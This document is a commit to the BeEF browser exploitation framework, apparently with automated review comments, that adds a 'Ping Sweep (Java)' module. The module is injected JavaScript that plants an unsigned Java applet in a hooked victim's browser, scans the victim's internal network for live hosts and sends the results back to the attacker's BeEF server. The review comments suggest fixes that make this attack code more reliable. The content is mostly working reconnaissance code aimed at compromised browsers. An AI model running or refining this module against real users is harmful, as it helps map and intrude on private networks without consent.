Added PingSweepJava module: as the PingSweep module works only on FF, this one uses an unsigned applet to do the same thing on all the other browsers :-)

git-svn-id: https://beef.googlecode.com/svn/trunk@1405 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
antisnatchor
2011-11-03 15:13:18 +00:00
parent de4c668834
commit c863d70c30
5 changed files with 209 additions and 0 deletions


@@ -0,0 +1,61 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var ipRange = "<%= @ipRange %>";
var timeout = "<%= @timeout %>";
var appletTimeout = 30;
var output = "";
var hostNumber = 0;
var internal_counter = 0;
var firstMsgSent = false;
beef.dom.attachApplet('pingSweep', 'pingSweep', 'pingSweep', "http://"+beef.net.host+":"+beef.net.port+"/", null, [{'ipRange':ipRange, 'timeout':timeout}]);
function waituntilok() {
try {
hostNumber = document.pingSweep.getHostsNumber();
if(hostNumber != null && hostNumber > 0){
if(!firstMsgSent){
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ps=Applet attached.<br>Hosts to check: ' + hostNumber + '<br>Required time (s): ~' + (timeout * hostNumber)/1000);
firstMsgSent = true;
}
output = document.pingSweep.getAliveHosts();
clearTimeout(int_timeout);
clearTimeout(ext_timeout);
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ps=Alive hosts:<br>'+output.replace(/\n/g,"<br>"));
beef.dom.detachApplet('pingSweep');
return;
}else{
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ps=No hosts to check');
return;
}
} catch (e) {
internal_counter++;
if (internal_counter > appletTimeout) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ps=Timeout after '+appletTimeout+' seconds');
beef.dom.detachApplet('pingSweep');
return;
}
int_timeout = setTimeout(function() {waituntilok()},1000);
}
}
ext_timeout = setTimeout(function() {waituntilok()},5000);
});
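Review bot: `int_timeout` and `ext_timeout` are assigned without being declared, and on a first successful pass `clearTimeout(int_timeout)` is reached before anything has assigned `int_timeout`. That reference throws inside the `try`, the catch-all `catch (e)` handles it like "applet not ready yet" and reschedules `waituntilok()`, so `getAliveHosts()` appears to run a second time before the result is reported. Declare both next to the other locals, `var int_timeout = null, ext_timeout = null;`, and limit the `try` to the two `document.pingSweep` calls so that genuine script errors are not retried silently. Separately, `ipRange` and `timeout` are rendered into string literals unescaped, so a quote in either option value breaks the generated script; checking their format on the server before rendering would avoid that.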


@@ -0,0 +1,27 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
ping_sweep_java:
enable: true
category: "Network"
name: "Ping Sweep (Java)"
description: "Discover active hosts in the internal network of the hooked browser. Same logic of the Ping Sweep module, but using an unsigned Java applet to work in browsers other than Firefox.<br> For Firefox, use the normal PingSweep module."
authors: ["antisnatchor"]
target:
working: ["S", "O", "IE"]
user_notify: ["C"]
not_working: ["FF"]


@@ -0,0 +1,44 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Ping Sweep Module - jgaliana
# Discover active hosts in the internal network of the hooked browser.
# It works calling a Java method from JavaScript and do not require user interaction.
class Ping_sweep_java < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/ping_sweep_java/pingSweep.class','/pingSweep','class')
end
def self.options
return [
{'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class or IP)', 'value' => '192.168.0.1-192.168.0.254'},
{'name' => 'timeout', 'ui_label' => 'Timeout (ms)', 'value' => '2000'}
]
end
def post_execute
content = {}
content['ps'] =@datastore['ps'] if not @datastore['ps'].nil?
if content.empty?
content['fail'] = 'No active hosts have been discovered.'
end
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/pingSweep.class')
save content
end
end
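Review bot: The header comment above `Ping_sweep_java` does not describe this file and looks carried over from the existing Ping Sweep module. It credits jgaliana and states that no user interaction is required, while the module's config in this same commit lists antisnatchor as author and puts Chrome under `user_notify`. Suggest replacing it with `# Ping Sweep (Java) Module - antisnatchor` and a second line such as `# Runs the sweep from an unsigned Java applet; see config.yaml for browsers that notify the user.` As a style point in `post_execute`, `content['ps'] =@datastore['ps'] if not @datastore['ps'].nil?` reads better as `content['ps'] = @datastore['ps'] unless @datastore['ps'].nil?`.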

Binary file not shown.


@@ -0,0 +1,77 @@
import java.applet.Applet;
import java.io.IOException;
import java.net.InetAddress;
import java.net.UnknownHostException;
import java.util.ArrayList;
import java.util.List;
/*
* Coded by Michele "antisnatchor" Orru' for the BeEF project.
* Given a single IP or IP range, check without hosts are alive (ping sweep).
*/
public class pingSweep extends Applet {
public static String ipRange = "";
public static int timeout = 0;
public static List<InetAddress> hostList;
public pingSweep() {
super();
return;
}
public void init(){
ipRange = getParameter("ipRange");
timeout = Integer.parseInt(getParameter("timeout"));
}
//called from JS
public static int getHostsNumber(){
try{
hostList = parseIpRange(ipRange);
}catch(UnknownHostException e){ //do something
}
return hostList.size();
}
//called from JS
public static String getAliveHosts(){
String result = "";
try{
result = checkHosts(hostList);
}catch(IOException io){
//do something
}
return result;
}
private static List<InetAddress> parseIpRange(String ipRange) throws UnknownHostException {
List<InetAddress> addresses = new ArrayList<InetAddress>();
if (ipRange.indexOf("-") != -1) { //multiple IPs: ipRange = 172.31.229.240-172.31.229.250
String[] ips = ipRange.split("-");
String[] octets = ips[0].split("\\.");
int lowerBound = Integer.parseInt(octets[3]);
int upperBound = Integer.parseInt(ips[1].split("\\.")[3]);
for (int i = lowerBound; i <= upperBound; i++) {
String ip = octets[0] + "." + octets[1] + "." + octets[2] + "." + i;
addresses.add(InetAddress.getByName(ip));
}
} else { //single ip: ipRange = 172.31.229.240
addresses.add(InetAddress.getByName(ipRange));
}
return addresses;
}
private static String checkHosts(List<InetAddress> inetAddresses) throws IOException {
String alive = "";
for (InetAddress inetAddress : inetAddresses) {
if (inetAddress.isReachable(timeout)) {
alive += inetAddress.toString() + "\n";
}
}
return alive;
}
}
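Review bot: `getHostsNumber()` calls `hostList.size()` after an empty `catch`, so if `parseIpRange` throws `UnknownHostException` on the first call, `hostList` is still null and the method fails with a `NullPointerException`. `parseIpRange` can also throw unchecked `NumberFormatException` or `ArrayIndexOutOfBoundsException` on a malformed range, and `init()` does the same on a missing `timeout` parameter; none of these are caught or reported. Initialise the list before the `try` with `hostList = new ArrayList<InetAddress>();` and validate the input in `parseIpRange` (four octets, each bound within 0–255, lower bound not above upper) so that bad input yields an empty list instead of an exception. The empty `//do something` catch blocks should at least record the failure so the caller can tell "no hosts alive" apart from "the check failed". The class comment also has a typo: "check without hosts are alive" should read "check which hosts are alive".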